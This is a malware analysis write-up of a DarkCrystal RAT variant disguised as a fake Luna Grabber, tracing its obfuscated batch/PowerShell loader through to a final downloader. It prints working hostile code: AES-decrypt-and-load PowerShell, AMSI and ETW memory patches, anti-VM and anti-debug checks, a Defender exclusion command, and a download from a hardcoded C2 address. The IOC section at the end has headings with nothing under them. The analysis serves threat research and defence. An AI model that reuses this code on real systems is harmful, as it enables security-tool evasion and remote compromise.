DarkCrystal RAT disguising as fake Luna Grabber

Final Deobfuscated Commands

After analyzing all the obfuscation layers, here are the three main commands that are executed:

# 1. Enable delayed expansion for variable manipulation
setlocal enabledelayedexpansion

# 2. Check for admin privileges (output redirected)
net file > nul 2>&1

# 3. If not admin, elevate privileges and execute payload
if not %errorlevel% == 0 (
    powershell -noprofile -ep bypass -command Start-Process -FilePath 'FZdX3l8.bat' 
    -ArgumentList 'C:\Users\FlareVM\Downloads\backup' -Verb runas & exit /b
)

# PowerShell Payload (Decryption and Execution)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){
    $aes_var=[System.Security.Cryptography.Aes]::Create();
    $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
    $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
    $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('i4vSoXCEtQ37PNNOx8z5sO/wltKpK2oVbiHWrLx6E6s=');
    $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R8I1hTiXQxSbILqNOs5ldQ==');
    $decryptor_var=$aes_var.CreateDecryptor();
    $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
    $decryptor_var.Dispose();
    $aes_var.Dispose();
    $return_var;
}

function decompress_function($param_var){
    $SgtCw=New-Object System.IO.MemoryStream(,$param_var);
    $AJtSO=New-Object System.IO.MemoryStream;
    $lunMv=New-Object System.IO.Compression.GZipStream($SgtCw, [IO.Compression.CompressionMode]::Decompress);
    $lunMv.CopyTo($AJtSO);
    $lunMv.Dispose();
    $SgtCw.Dispose();
    $AJtSO.Dispose();
    $AJtSO.ToArray();
}

function execute_function($param_var,$param2_var){
    $cbihh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);
    $qMawP=$cbihh.EntryPoint;
    $qMawP.Invoke($null, $param2_var);
}

$Fuaqw = 'C:\Users\FlareVM\Downloads\backup\FZdX3l8.bat';
$host.UI.RawUI.WindowTitle = $Fuaqw;
$gItfV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Fuaqw).Split([Environment]::NewLine);
foreach ($ZTWyH in $gItfV) {
    if ($ZTWyH.StartsWith(':: '))
    {
        $Tracn=$ZTWyH.Substring(3);
        break;
    }
}

$payloads_var=[string[]]$Tracn.Split('\');
$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));
$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));
execute_function $payload1_var $null;
execute_function $payload2_var (,[string[]] (''));

Deep Dive: Self-Contained Payload Architecture

During the analysis, I discovered something particularly fascinating about this DCRat variant. Instead of the typical approach of downloading additional payloads from a C2 server, the malware authors implemented a completely self-contained architecture.

• The entire DCRat payload is embedded directly within the batch file as Base64 encoded strings
• Encryption is handled through AES-CBC with these hardcoded values:
  • • Key: i4vSoXCEtQ37PNNOx8z5sO/wltKpK2oVbiHWrLx6E6s=
  • • IV: R8I1hTiXQxSbILqNOs5ldQ==
• GZip compression is used to minimize the payload size
• The deobfuscation process follows these stages:
  1. Base64 decode the embedded strings
  2. Decrypt using AES-CBC
  3. Decompress using GZip
  4. Load and execute the resulting .NET assembly directly in memory

This architectural choice is clever for several reasons. First, it eliminates the dependency on network connectivity and C2 server availability, making the malware more reliable. Second, it helps evade network-based detection systems since no suspicious download activity occurs. The use of legitimate PowerShell cryptographic functions and memory-based execution also helps bypass certain security controls.

Dual Payload Analysis: A Closer Look

One of the most intriguing aspects of this DCRat variant is its dual payload system. Looking at the PowerShell code, we can see two distinct payloads being processed:

$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));
        
$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));

What's particularly interesting is how these payloads are executed:

execute_function $payload1_var $null;
execute_function $payload2_var (,[string[]] (''));

The execution pattern reveals a few key insights:

• First Payload: Executed with null parameters, suggesting this is likely the initial setup or loader component
• Second Payload: Called with an empty string array, indicating this is probably the main DCRat functionality

This split architecture is a common technique in sophisticated malware for several reasons:

• Modular Design: Separates the loader logic from the main malware functionality
• Anti-Analysis: Makes static analysis more challenging as the full functionality isn't immediately apparent
• Memory Management: Allows for more efficient resource usage by loading components only when needed

Both payloads are loaded directly into memory using System.Reflection.Assembly, leaving minimal traces on disk and making detection more difficult for traditional antivirus solutions.

Payload1: The Phantom Crypter Analysis

After extracting and decompiling Payload1 with dnSpy, I discovered it's the Phantom Crypter. Looking at both the decompiled code and the PowerShell loader script, we can see how it fits into the malware's execution chain.

The PowerShell script processes both payloads similarly:

• Both are stored as encrypted, compressed Base64 strings
• Both undergo the same decryption (AES-CBC) and decompression (GZip) process
• Both are loaded into memory using Reflection

The Phantom Crypter's code shows a sophisticated AMSI bypass technique that works by patching the AmsiScanBuffer function in memory. Let's break down how it works:

1. Locating AMSI

private static string obfDll_Str = "^a^m^s^i^.^d^l^l^".Replace("^", "");

First, it obfuscates the "amsi.dll" string to avoid static detection. The string is split with "^" characters and then reconstructed at runtime.

2. ASLR-Aware Memory Location

private static IntPtr ASLR(IntPtr Relative_Address, IntPtr Relative_BaseAddress, string ModuleName)
        {
            return (IntPtr)((long)Relative_Address - (long)Relative_BaseAddress + 
                (long)Program.GetModuleHandle(ModuleName));
        }

The ASLR function calculates the real address of AmsiScanBuffer by:

• Getting the current base address of amsi.dll using GetModuleHandle
• Calculating the offset from the known relative addresses
• Adjusting for ASLR (Address Space Layout Randomization)

3. Memory Patching

Program.VirtualProtect(intPtr, (UIntPtr)((ulong)array2.Length)), 
            Program.PAGE_EXECUTE_READWRITE, out num);
        Marshal.Copy(array2, 0, intPtr, array2.Length);
        Program.VirtualProtect(intPtr, (UIntPtr)((ulong)array2.Length)), num, out num);

The actual bypass happens in three steps:

• Changes the memory protection to allow writing (PAGE_EXECUTE_READWRITE)
• Copies a patch (either 6 or 8 bytes depending on architecture) that effectively disables the scanning function
• Restores the original memory protection to avoid detection

This technique is particularly effective because it:

• Works on both 32-bit and 64-bit systems
• Survives ASLR memory randomization
• Modifies AMSI in memory without touching the disk
• Uses legitimate Windows APIs, making it harder to detect

Program.VirtualProtect(intPtr, (UIntPtr)((ulong)array2.Length)), 
              Program.PAGE_EXECUTE_READWRITE, out num);

Marshal.Copy(array2, 0, intPtr, array2.Length);

Program.VirtualProtect(intPtr, (UIntPtr)((ulong)array2.Length)), num, out num);

For a more detailed explanation of AMSI bypass and memory patching techniques, check out this excellent article on Medium.

This suggests that rather than being a preparation stage, Payload1 might be running in parallel with Payload2, handling the AMSI bypass while the main DCRat functionality executes.

Understanding Payload Interaction

Looking at how both payloads are executed in the PowerShell script reveals an interesting pattern:

execute_function $payload1_var $null;
execute_function $payload2_var (,[string[]] (''));

The execution sequence tells us several important things:

• Payload1 (Phantom Crypter):
  • • Executed first with null parameters
  • • Stays resident in memory
  • • Provides continuous AMSI bypass through memory patching
• Payload2 (DCRat):
  • • Executed immediately after with an empty string array
  • • Benefits from the AMSI bypass already in place
  • • Contains the main RAT functionality

The interaction appears to be designed for parallel operation:

Memory Space
        ┌────────────────────────────┐
        │ Payload1 (Phantom Crypter) │
        │ ┌──────────────────────┐  │
        │ │    AMSI Bypass       │  │
        │ │    (Active)          │  │
        │ └──────────────────────┘  │
        │           ▲               │
        │           │               │
        │ Payload2 (DCRat)          │
        │ ┌──────────────────────┐  │
        │ │    RAT Operations    │──┼─> Network
        │ │    (Running)         │  │    Operations
        │ └──────────────────────┘  │
        └────────────────────────────┘

This design is quite clever because:

• The AMSI bypass remains active throughout the entire session
• Both payloads operate independently but complement each other
• The separation of concerns makes the malware more modular and harder to detect

Payload2: The DCRat Stager

After further analysis, it's clear that Payload2 is actually a stager that prepares the environment and loads the actual DCRatLoader (payload.exe). Let's examine its key components:

1. Anti-Virtualization Checks

ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem");
        ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get();
        foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
        {
            string text = managementBaseObject["Manufacturer"].ToString().ToLower();
            if ((text == "microsoft corporation" && 
                 managementBaseObject["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || 
                text.Contains("vmware") || 
                managementBaseObject["Model"].ToString() == "VirtualBox")
            {
                Environment.Exit(1);
            }
        }

Uses WMI queries to detect and exit if running in common virtual environments like VMware or VirtualBox.

2. Anti-Debugging Techniques

bool flag = false;
        CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref flag);
        if (Debugger.IsAttached || flag || IsDebuggerPresent())
        {
            Environment.Exit(-1);
        }

Employs multiple debugger detection methods, combining both managed and native Windows API calls.

3. Disabling Event Logging

IntPtr intPtr = LoadLibrary("ntdll.dll");
        IntPtr procAddress = GetProcAddress(intPtr, "EtwEventWrite");
        byte[] array2 = IntPtr.Size != 8 ? new byte[] { 194, 20 } : new byte[] { 195 };
        VirtualProtect(procAddress, (UIntPtr)((ulong)array2.Length)), PAGE_EXECUTE_READWRITE, out num);
        Marshal.Copy(array2, 0, procAddress, array2.Length);

Patches the ETW (Event Tracing for Windows) function in memory to prevent logging of malicious activities.

4. Payload Decryption and Decompression

byte[] array4 = iBkhXNVFlSxeBNagfAEi(    // GZip decompression
            BHzuHobrSPuzABSKKIzo(              // AES decryption
                gtwePDhAccqMJmKZxswU(text2),   // Resource extraction
                Convert.FromBase64String("OFBzsjWvvPL6WSq/1UuUe3C/jKVmeriehNrKxcILwgw="),
                Convert.FromBase64String("Sh+DW8pynt9N99iwSkFJuQ==")
            )
        );

The DCRatLoader (payload.exe) is processed through multiple layers: resource extraction, AES decryption with Base64-encoded key/IV, and GZip decompression.

5. Embedded Resource Execution

Assembly executingAssembly = Assembly.GetExecutingAssembly();
        byte[] array4 = OFUmxiKpUkcHcUMaviAS.iBkhXNVFlSxeBNagfAEi(
            OFUmxiKpUkcHcUMaviAS.BHzuHobrSPuzABSKKIzo(
                OFUmxiKpUkcHcUMaviAS.gtwePDhAccqMJmKZxswU("payload.exe"), 
                Convert.FromBase64String("OFBzsjWvvPL6WSq/1UuUe3C/jKVmeriehNrKxcILwgw="), 
                Convert.FromBase64String("Sh+DW8pynt9N99iwSkFJuQ==")
            )
        );
        MethodInfo entryPoint = Assembly.Load(array4).EntryPoint;
        entryPoint.Invoke(null, new object[] { args });

The final stage loads the DCRatLoader directly into memory using Assembly.Load and executes it via reflection, avoiding any disk writes.

DCRatLoader: The Final Stage

The DCRatLoader (payload.exe) establishes connection with the C2 server and downloads additional payloads. Let's examine its components:

1. Setting Security Protocols

ServicePointManager.SecurityProtocol = SecurityProtocolType.Ssl3 | SecurityProtocolType.Tls;
        try {
            ServicePointManager.SecurityProtocol = SecurityProtocolType.Ssl3 | SecurityProtocolType.Tls | 
                SecurityProtocolType.Tls11 | SecurityProtocolType.Tls12;
        } catch { }

Ensures compatibility with various HTTPS implementations by supporting multiple TLS versions, with a fallback mechanism if newer protocols aren't available.

2. Hardcoded URLs

// Base64: "aHR0cDovLzg3LjEyMS4xMDUuMjQzL3lhci9ld3EuYmF0MTIz"
        // Decoded: "http://87.121.105.243/yar/ewq.bat123"
        string @string = Encoding.Default.GetString(Convert.FromBase64String(
            "aHR0cDovLzg3LjEyMS4xMDUuMjQzL3lhci9ld3EuYmF0MTIz"));
        
        // Base64: "e1NZU1RFTURSSVZFfS9Vc2Vycy97VVNFUk5BTUV9L0FwcERhdGEvTG9jYWwvVGVtcC9ld3EuYmF0"
        // Decoded: "{SYSTEMDRIVE}/Users/{USERNAME}/AppData/Local/Temp/ewq.bat"
        string text = Encoding.Default.GetString(Convert.FromBase64String(
            "e1NZU1RFTURSSVZFfS9Vc2Vycy97VVNFUk5BTUV9L0FwcERhdGEvTG9jYWwvVGVtcC9ld3EuYmF0"));

Contains Base64-encoded C2 server URL and local file path. The C2 server is hosted at 87.121.105.243.

3. Downloading the Malicious File

try {
            if (File.Exists(text)) {
                File.Delete(text);
            }
        } catch { }
        
        new WebClient().DownloadFile(@string, text);

Downloads the batch file from the C2 server, first removing any existing version to ensure clean execution.

4. Executing the Batch Script

// Base64: "cG93ZXJzaGVsbCBBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICdDOlxVc2Vyc1wlVVNFUk5BTUV9L0FwcERhdGEn"
        // Decoded: "powershell Add-MpPreference -ExclusionPath 'C:\Users\%USERNAME%\AppData'"
        string string2 = Encoding.Default.GetString(Convert.FromBase64String(
            "cG93ZXJzaGVsbCBBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICdDOlxVc2Vyc1wlVVNFUk5BTUV9L0FwcERhdGEn"));
        
        Process.Start(new ProcessStartInfo {
            WindowStyle = ProcessWindowStyle.Hidden,
            FileName = "cmd.exe",
            Arguments = "/C " + string2
        });

Executes a hidden PowerShell command to add the AppData folder to Windows Defender exclusions, preparing for malware execution.

5. Privilege Escalation and Execution

Process.Start(new ProcessStartInfo {
            FileName = text2,
            Verb = (new WindowsPrincipal(WindowsIdentity.GetCurrent())
                .IsInRole(WindowsBuiltInRole.Administrator) ? "runas" : "")
        });

Attempts to run the downloaded batch file with elevated privileges if the current user has admin rights, using the "runas" verb.

Indicators of Compromise (IOCs)

Network Indicators

File Indicators

System Changes